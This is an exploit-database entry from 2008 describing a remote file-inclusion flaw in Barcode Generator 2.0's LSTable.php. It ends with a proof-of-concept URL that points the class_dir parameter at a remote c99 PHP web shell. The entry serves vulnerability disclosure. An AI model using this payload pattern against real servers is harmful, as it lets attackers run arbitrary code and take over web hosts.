Barcode Generator 2.0 - LSTable.php Remote File Inclusion

2008-09-26T00:00:00
ID EXPLOITPACK:6B18C9DF4C2DE130F9D3C16120A1C8BE
Type exploitpack
Reporter Br0k3n H34rT
Modified 2008-09-26T00:00:00

Description

Barcode Generator 2.0 - LSTable.php Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/31419/info

Barcode Generator is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

Barcode Generator 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt?